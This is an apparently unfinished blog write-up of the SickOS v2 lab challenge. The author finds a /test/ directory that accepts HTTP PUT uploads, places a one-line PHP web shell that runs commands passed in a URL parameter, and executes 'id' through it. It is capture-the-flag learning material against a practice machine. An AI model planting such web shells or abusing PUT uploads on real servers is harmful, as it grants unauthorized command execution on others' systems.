Wednesday 1 June 2016

SickOS v2 challenge

Hi,
Looking for our target

OK, our target has been assigned the IP address 192.168.1.102.

Scanning

Good, I prefer to begin pentesting from the web application.

The above picture is a default page. The source code contains only the information that this picture is named blow.jpg. I have run dirbuster and

The /test/ directory is empty, and index.php contains the blow.jpg picture. I haven't found exploits for lighttpd and OpenSSH. Hmmm, the /test/ directory looks interesting, but at first glance it is nothing special. In the meantime I downloaded the blow.jpg picture and looked for sensitive information hardcoded into the picture, without success.
I have tried to PUT a script such as a phpinfo and SUCCESS!!!

Click on test.php and

Great! We have got the following result because our test.php contains:
<?php phpinfo(); ?>
This is our opportunity to upload a reverse shell.
I have uploaded our reverse shell script and named it shell1.php:
<?php echo exec($_GET['cmd']); ?>
and let's try to execute the id command on the shell

Excellent! We have got a limited shell via the web browser. It's not comfortable for me. I am going to try to achieve a limited shell in some other way.

TBU